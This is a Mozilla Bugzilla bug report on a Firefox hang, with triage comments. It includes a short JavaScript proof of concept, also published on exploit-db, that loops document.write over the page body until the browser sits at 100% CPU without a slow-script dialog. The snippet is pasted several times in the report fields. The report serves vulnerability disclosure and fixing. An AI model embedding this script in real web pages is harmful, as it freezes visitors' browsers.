Open Bug 612029 Opened 14 years ago Updated 3 months ago

document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect

Tracking

()

Tracking Flags:
Tracking Status
blocking2.0 --- -
status1.9.2 --- wanted
status1.9.1 --- wanted

People

(Reporter: pusat_6807, Unassigned)

References

(Depends on 2 open bugs,
URL
)

Details

(Keywords: csectype-dos, hang, Whiteboard: [sg:dos])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Reproducible: Always Steps to Reproduce: 1.Ddos Atack 2. 3. Actual Results: <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Expected Results: <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
URL: http://www.cyber-heaven.tk
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
We probably didn't need 5 copies of the code in-line... Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
URL: http://www.cyber-heaven.tkhttp://www.exploit-db.com/exploits/15...
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
blocking1.9.1: ? → ---
blocking1.9.2: ? → ---
status1.9.1: --- → wanted
status1.9.2: --- → wanted
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
Is 4.0 afflicted?
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
(In reply to comment #6) > Is 4.0 afflicted? Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog. Tested on Linux, WinXP and OSX. On Linux, the OOM killer kills the process after ~10 seconds.
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking2.0: ? → -
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
Severity: normal → S3

The severity field for this bug is relatively low, S3. However, the bug has 10 duplicates.
:mossop, could you consider increasing the bug severity?

For more information, please visit auto_nag documentation.

Flags: needinfo?(dtownsend)

The last needinfo from me was triggered in error by recent activity on the bug. I'm clearing the needinfo since this is a very old bug and I don't know if it's still relevant.

Flags: needinfo?(dtownsend)
See Also: → 1895161
Depends on: eviltraps
Keywords: csectype-dos
You need to log in before you can comment on or make changes to this bug.